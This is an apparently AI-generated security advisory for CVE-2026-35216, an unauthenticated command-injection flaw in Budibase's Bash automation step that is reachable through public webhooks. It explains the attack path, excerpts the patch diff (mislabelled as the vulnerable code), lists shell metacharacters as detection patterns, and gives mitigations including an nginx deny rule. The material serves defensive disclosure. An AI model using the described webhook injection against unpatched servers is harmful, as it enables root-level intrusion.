CVE-2026-35216 Overview
CVE-2026-35216 is a critical Remote Code Execution (RCE) vulnerability in Budibase, an open-source low-code platform for building business applications. Prior to version 3.33.4, an unauthenticated attacker can achieve Remote Code Execution on the Budibase server by triggering an automation that contains a Bash step via the public webhook endpoint. This vulnerability is classified as CWE-78 (OS Command Injection).
Critical Impact
Unauthenticated attackers can execute arbitrary commands as root inside the container without any authentication, potentially leading to complete system compromise, data exfiltration, and lateral movement within the network.
Affected Products
- Budibase versions prior to 3.33.4
- Budibase instances with automations containing Bash steps exposed via public webhooks
- Self-hosted and cloud deployments running vulnerable versions
Discovery Timeline
- 2026-04-03 - CVE-2026-35216 published to NVD
- 2026-04-08 - Last updated in NVD database
Technical Details for CVE-2026-35216
Vulnerability Analysis
The vulnerability exists in Budibase's automation system, specifically in how the Bash automation step processes user-controlled input. The platform allows users to create automations that can be triggered via public webhook endpoints. When a Bash step is included in such an automation, the lack of proper input validation and authentication allows external attackers to inject and execute arbitrary shell commands on the underlying server.
The attack is particularly severe because the process executes as root inside the container, granting the attacker full privileges within that containerized environment. This could enable container escape attempts, access to sensitive configuration data, and the ability to pivot to other services or systems accessible from the compromised container.
Root Cause
The root cause is improper input validation in the Bash automation step handler. The vulnerable code used execSync from Node.js child_process module and allowed template bindings directly within the command string. This enabled attackers to inject malicious commands through the webhook payload that would be processed and executed without proper sanitization.
The fix introduced several key changes: replacing execSync with execa for safer command execution, implementing validation that rejects command bindings (Handlebars template expressions) in the command field, and requiring dynamic values to be passed through a validated args field that enforces JSON array of strings format.
Attack Vector
The attack exploits the public webhook endpoint functionality in Budibase. An attacker identifies a Budibase instance with a publicly accessible webhook that triggers an automation containing a Bash step. By crafting a malicious webhook request with command injection payloads embedded in template bindings, the attacker can execute arbitrary shell commands on the server.
The network-based attack vector requires no authentication, though exploitation complexity is elevated due to the requirement of finding or creating a webhook-triggered automation with a Bash step.
// Vulnerable code pattern (before fix)
-import { execSync } from "child_process"
-import { processStringSync } from "@budibase/string-templates"
+import execa from "execa"
+import { findHBSBlocks, processStringSync } from "@budibase/string-templates"
import * as automationUtils from "../automationUtils"
import environment from "../../environment"
import { BashStepInputs, BashStepOutputs } from "@budibase/types"
+const INVALID_INPUTS = "Budibase bash automation failed: Invalid inputs"
+const COMMAND_BINDINGS_ERROR =
+ "Budibase bash automation failed: Command bindings are not supported. Use the args field for dynamic values."
+const ARGS_VALIDATION_ERROR =
+ "Budibase bash automation failed: Args must be a JSON array of strings."
+
+interface JsonEditorInput {
+ value?: unknown
+}
+
+const validateArgs = (args: unknown): string[] => {
+ if (!Array.isArray(args) || args.some(arg => typeof arg !== "string")) {
+ throw new Error(ARGS_VALIDATION_ERROR)
+ }
+
+ return args
+}
+
+const parseArgs = (args: unknown) => {
+ if (args == null) {
+ return []
+ }
Source: GitHub Commit f0c731b
Detection Methods for CVE-2026-35216
Indicators of Compromise
- Unexpected outbound network connections originating from Budibase container processes
- Unusual process spawning activity within Budibase containers, particularly shell commands not typical of normal operation
- Webhook access logs showing suspicious payloads containing shell metacharacters or command sequences
- Modifications to container filesystem or unexpected file creation in temporary directories
Detection Strategies
- Monitor webhook endpoint access patterns for unusual request frequencies or payloads containing common command injection patterns (;, |, &&, $(), backticks)
- Implement application-level logging to capture automation trigger events and Bash step executions
- Deploy runtime container security solutions to detect anomalous process execution within Budibase containers
- Review automation configurations for Bash steps connected to public webhooks
Monitoring Recommendations
- Enable verbose logging for Budibase automation executions and webhook triggers
- Configure alerts for process execution anomalies within containerized environments
- Implement network traffic analysis to detect potential data exfiltration attempts from Budibase infrastructure
- Regularly audit public webhook configurations and their associated automation workflows
How to Mitigate CVE-2026-35216
Immediate Actions Required
- Upgrade Budibase to version 3.33.4 or later immediately
- Audit all existing automations for Bash steps connected to public webhooks and disable or restrict access pending upgrade
- Review webhook access logs for signs of exploitation attempts
- Implement network segmentation to limit potential lateral movement if exploitation has occurred
Patch Information
Budibase has released version 3.33.4 which addresses this vulnerability. The fix implements several security improvements to the Bash automation step:
- Replaced execSync with execa for safer command execution
- Added validation to reject Handlebars template bindings in command names
- Implemented strict argument validation requiring JSON array of strings format
- Modified the automation processing to skip template processing for Bash steps, allowing the step to handle its own templating securely
Apply the patch by updating to version 3.33.4 or later. For details, see the GitHub Security Advisory GHSA-fcm4-4pj2-m5hf and the GitHub Pull Request #18238.
Workarounds
- Disable all public webhooks that trigger automations containing Bash steps until the patch can be applied
- Implement web application firewall (WAF) rules to filter requests containing shell metacharacters targeting webhook endpoints
- Restrict network access to Budibase webhook endpoints using firewall rules or reverse proxy configurations
- Run Budibase containers with non-root users where possible to limit the impact of potential exploitation
# Example: Restrict webhook access via nginx
location /api/public/v1/webhooks {
# Temporarily deny all external access to webhooks
deny all;
# Or restrict to trusted IP ranges only
# allow 10.0.0.0/8;
# deny all;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
